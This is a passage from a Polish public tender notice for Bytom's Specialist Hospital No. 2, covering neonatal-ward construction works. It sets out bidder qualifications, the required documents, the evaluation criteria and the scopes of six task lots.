	Kierownika robót elektrycznych - posiadającego co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za wykonywanie robót z zakresu budowy robót elektrycznych tym sieci i instalacji elektroenergetycznych i niskoprądowych., w tym doświadczenie w pełnieniu samodzielnej funkcji technicznej w budownictwie (kierownika budowy lub robót, oraz posiadającego uprawnienia bez ograniczeń do kierowania robotami elektrycznymi, wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju co winno wynikać z dokumentów określonych w pkt. 10.1.3. i 10.1.4.( wymagane doświadczenie w wykonywaniu instalacji niskoprądowych)
Oferent dla zadania nr 6 winien posiadać system zarządzania jakością ISO 13485 w zakresie projektowania, produkcji, montażu, certyfikacji i serwisów systemów instalacji gazów medycznych i próżni
10.1.3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  - wzór druku wykazu stanowi załącznik nr 4 do IDW,
10.1.4.	 Zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.1.3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia, tj.
O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować odpowiednio wykwalifikowanymi osobami posiadającymi uprawnienia do kierowania robotami budowlanymi w odpowiednich specjalnościach dla obsadzenia stanowisk:
Kierownika Budowy posiadającego wykształcenie wyższe i co najmniej 5 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi w specjalności konstrukcyjno - budowlanej na stanowisku kierownika budowy, lub kierownika robót, gdzie był odpowiedzialny w szczególności za wykonywanie robót budowlanych dotyczących obiektów szpitalnych oraz posiadającego uprawnienia konstrukcyjno-budowlane bez ograniczeń, a także wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju.(wymagane doświadczenie w wykonywaniu prac w Obiektach Ochrony Zdrowia) 
Kierownika robót instalacyjnych - posiadającego co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za wykonywanie robót z zakresu budowy sieci i instalacji c.o., w tym doświadczenie w pełnieniu samodzielnej funkcji technicznej w budownictwie (kierownika budowy lub robót, oraz posiadającego uprawnienia bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie, kierownika budowy i robót 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, cieplnych, gazowych, wodociągowych i kanalizacyjnych), wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju co winno wynikać z dokumentów określonych w pkt. 10.1.3. i 10.1.4.( dla zadania 6 wymagane doświadczenie w wykonywaniu gazów medycznych w obiektach szpitalnych)
	Kierownika robót elektrycznych - posiadającego co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za wykonywanie robót z zakresu budowy robót elektrycznych tym sieci i instalacji elektroenergetycznych i niskoprądowych., w tym doświadczenie w pełnieniu samodzielnej funkcji technicznej w budownictwie (kierownika budowy lub robót, oraz posiadającego uprawnienia bez ograniczeń do kierowania robotami elektrycznymi, wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju co winno wynikać z dokumentów określonych w pkt. 10.1.3. i 10.1.4.( wymagane doświadczenie w wykonywaniu instalacji niskoprądowych)
Oferent dla zadania nr 6 winien posiadać system zarządzania jakością ISO 13485 w zakresie projektowania, produkcji, montażu, certyfikacji i serwisów systemów instalacji gazów medycznych i próżni
10.1.3.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  - wzór druku wykazu stanowi załącznik nr 4 do IDW,
10.1.4.	 Zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.1.4. sytuacji ekonomicznej i finansowej, tj.
O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na wykonanie zamówienia przy założeniu iż płatnośc nastąpi w II etapach po odbiorze częściowym i końcowym, w szczególności o zamówienie mogą ubiegać się wykonawcy, którzy
 1). dysponują, lub będą dysponować środkami finansowymi wystarczającymi do realizacji   
       przedmiotu zamówienia, określonymi na sumę co najmniej:
       dla zadania nr 1   300 000,00 zł,
       dla zadania nr 2   250 000,00 zł
       dla zadania nr 3   50 00,00 zł
       dla zadania nr 4   200 000,00 zł
       dla zadania nr 5   50 000,00 zł
       dla zadania nr 6   100 000,00 zł
 co winno wynikać z dokumentów określonych w pkt. 10.1.6.
2). są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej: 500 000,00 zł
 co powinno wynikać z dokumentu określonego w pkt. 10.1.5. 
10.1.5.	Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień- wzór druku stanowi załącznik nr 4a do IDW,
10.1.6.	Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Do oferty należy dołączyć potwierdzenie opłacenia polisy lub fakt jej opłacenia musi wynikać z treści dokumentu. Jeżeli fakt opłacenia polisy nie wynika wprost z załączonego do oferty dokumentu, wykonawca jest zobowiązany dołączyć inny dokument potwierdzający opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>10.1.2.	wykazu wykonanych, niewykonanych lub nienależycie wykonanych robót budowlanych (na formularzu stanowiącym Załącznik nr 3 do IDW), z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
W wykazie należy ująć roboty wykonane (tj. zakończone) w zakresie niezbędnym do wykazania w sposób bezsporny spełniania warunku wiedzy i doświadczenia opisanego w pkt. 9.1.2 oraz wszelkie roboty tego typu niewykonane lub wykonane nienależycie, w celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawcy. 
Uwaga: Zamawiający informuje, iż w przypadku gdy co najmniej jedna robota będzie nienależycie wykonana lub niewykonana spośród robót , które Wykonawca winien ująć w wykazie, Wykonawca ten zostanie wykluczony z postępowania o zamówienie publiczne.
    W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz gdy Wykonawca polega na wiedzy i doświadczeniu innych podmiotów,  również jedna robota nienależycie wykonana, lub nie wykonana będzie liczona łącznie dla wszystkich robót ujętych w wykazie niezależnie od podmiotu, który ją wykonał;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">10.12.	W celu potwierdzenia, że oferowane w ramach realizacji przedmiotu zamówienia dostawy spełniają wymagania zamawiającego, wykonawca wraz z oferta składa wypełnione i podpisane: Specyfikacja techniczna wyposażenia - technologia medyczna załącznik nr 1 do Zadania nr 6oraz Wymagane i oferowane parametry techniczne dźwigu szpitalnego załącznik nr 1 do zadania nr 1 - stanowiący element załącznika Części D do SIWZ;</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Długość udzielonej gwarancji - 2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital2.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny numer 2 w Bytomiu , ul. St. Batorego 15 
41-902 Bytom ( pokój nr.19. I piętro , Zam. Publiczne , Budynek Dyrekcji ) lub bezpłatnie na stronie internetowej szpitala..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2015 godzina 10:00, miejsce: Szpital Specjalistyczny numer 2 w Bytomiu , ul. St. Batorego 15  41-902 Bytom ( pokój nr.2 ,  parter , Kancelaria Głowna , Budynek Dyrekcji ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 Roboty ogólnobudowlane i wykończeniowe wraz dostawą i  montażem dźwigu szpitalnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 Roboty ogólnobudowlane i wykończeniowe wraz dostawą i  montażem dźwigu szpitalnego.

	Opis przedmiotu zamówienia
Przedmiotem zamówienia są roboty ogólnobudowlane polegające na wykonaniu prac budowlanych, prac instalacyjnych oraz wszelkich wykończeniowych obejmujących łącznik pomiędzy blokiem nr 5 i 5a oraz  na przebudowie 1 piętra budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż. W ramach niniejszego zadania należy również wykonać wszelkie czynności związane z koordynacją wszystkich, poszczególnych branż i pakietów jak niżej  na placu budowy i uzyskanie pozwolenia na użytkowanie nowopowstałego i przebudowanego zespołu budynków tj: łącznika , przewiązki, bloku Va łacznie             z dobudowaną klatką schodową w uzgodnieniu z dotychczasowym Kierownikiem Robót GW                           i Koordynatorem ds. Inwestycji i Remontów  Szpitala Specjalistycznego nr 2 w Bytomiu w zakresie : robót, prób , badań i sprawdzeń. Instalacje niskoprądowe należy wykonać  w  nawiązaniu do opracowań i robót wykonywanych przez GW wykonującego prace w   przedmiotowym zadaniu  z wyłączeniem I piętra i łącznika wraz z projektem wykonawczym.
Zbiorczy całościowy HARMONOGRAM realizacji rzeczowo-finansowy winien być opracowany przez Wykonawcze realizującego Zadanie nr 1 na bazie i w uzgodnieniu z wykonawcami wykonującymi pozostałe zadania i przekazany  Zamawiającemu.
 Dostawa i montaż dźwigu szpitalnego.

Opis przedmiotu zamówienia
Przedmiotem zamówienia jest dostawa  i montaż 1 dźwigu szpitalnego 10 przystankowego elektrycznego zlokalizowanego w łączniku komunikacyjnym pomiędzy blokiem nr 5 i 5a  Szpitala Specjalistycznego nr 2 w Bytomiu  na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż. Szczegółowy wymagane dane techniczne dźwigu będące opisem stanowi Załącznik nr 1 do Zadania nr 1 będący stanowiąca część D niniejszej SIWZ. W ramach dostawy dźwigu należy uzyskać odbiór UDT, a także wykonać roboty w branży budowlanej i elektrycznej.
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i łącznika pomiędzy blokiem nr 5 i 5a i stanowiąca część D Pakiet nr 1 niniejszej SIWZ ,.45000000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Długość udzielonej gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2  Instalacje elektryczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2  Instalacje elektryczne
Opis przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie nowej instalacji elektrycznej, niskoprądowej w tym instalacji  przeciwpożarowej i sygnalizacji pożaru,  obejmujących łącznik pomiędzy blokiem nr 5 i 5a oraz 1 piętro budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu   na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż.
Zamawiający wymaga aby oferowane oświetlenie zostało wykonane w technologii LED energooszczędnej. Dodatkowo na łączniku należy zastosować czujniki ruchu umożliwiające wł/wył oświetlenia w zależności od ruchu pieszego.   
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i łącznika pomiędzy blokiem nr 5 i 5a i stanowiąca część D Pakiet nr 2 niniejszej SIWZ ,.
         UWAGA: W załączonych przedmiarach Zamawiający wyłącza z wyceny i wykonania Dział 6 Instalacja detekcji gazów poz 79-91 oraz z Działy 7 poz 97 - Roboty dodatkowe. W Dziale 1 należy uwzględnić dodatkowe rozdzielnice w przedmiarze są 4 komplety prawidłowa wartość 5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.37.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Długość udzielonej gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 Instalacje wod-kan, c.o..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 Instalacje wod-kan, c.o.
Przedmiotem zamówienia jest wykonanie nowej instalacji wod-kan, c.o,  obejmującej 1 piętro budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu  na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż. 
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c. 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i stanowiąca część D Pakiet nr 3 niniejszej SIWZ ,.
Należy w obiekcie stosować grzejniki higieniczne wg PN. oraz wykonać drugi hydrant na klatce schodowej w systemie łącznie z projektem wykonawczym wraz z  uzyskaniem akceptacji rzeczoznawcy ppoż.
Lokalizacja drugiego pionu hydrantowego w przy klatce schodowej w bloku VA wraz z           uzgodnieniem z rzeczoznawca ppoż. i wykonanie niezbędnych robót budowlanych i          wykończeniowych w tym zakresie w sposób nie powodujący utratę gwarancji dotychczasowego          GW..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Długość udzielonej gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 Wentylacja mechaniczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie nowej instalacji wentylacji mechanicznej  obejmujących w bloku  5a 1 piętro budynku z uwzględnieniem zakupionych i zamontowanych na dachu budynku central wentylacyjnych  w  Szpitala Specjalistycznego nr 2 w Bytomiu  na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż. 
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i łącznika pomiędzy blokiem nr 5 i 5a i stanowiąca część D Pakiet nr 4 niniejszej SIWZ ,.
Należy dostosować wentylację nawiewną i wywiewną w  pomieszczeniach sprężarkowi zlokalizowanej w bloku VI Szpitala Specjalistycznego nr tak, aby uzyskać wymagane warunki     
normowe. Należy uwzględnić dostosowanie centrali wentylacyjnej w układ schładzania powietrza na I piętrze.
         UWAGA: W załączonych przedmiarach Zamawiający dopuszcza wyłączenie części klap ppoż. Z poz. od 14-21 przechodzących przez przegrody pionowe po wcześniejszym uzgodnieniu z rzeczoznawcą ppoż. a ponadto zamienia  izolacji z kauczuku na izolację z wełny mineralnej w płaszczu z aluminium..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Długość udzielonej gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr  5  Ułożenie kabli niskiego napięcia
4531100.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr  5  Ułożenie kabli niskiego napięcia
Opis przedmiotu zamówienia
             Przedmiotem zamówienia jest :  1.  ułożenie dwóch kabli niskiego napięcia zasilających   
       Rozdzielnię Główną  bloku 5a szpitala ( wraz z jednym kablem sterowniczym )  z projektowanej  
       stacji transformatorowej odbiorczej szpitala , 2. podpięcie tych kabli w Rozdzielni Głównej bloku 5a   
       i przeprogramowanie automatyki SZR w.w Rozdzielni Głównej wraz  z połączeniem z istniejącymi    
       kablami zasilającymi  pozostałe budynki szpitala . 
              Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Przedsiębiorstwo  
              Produkcyjno-Usługowe BUDOMONT - 7  sp. z o.o. ,41-704 Ruda Śląska,  ul. Kardynała Augusta 
              Hlonda 50 stanowiąca część D Pakiet nr 5 niniejszej SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Długość udzielonej gwarancji - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6  Instalacje gazów medycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6  Instalacje gazów medycznych
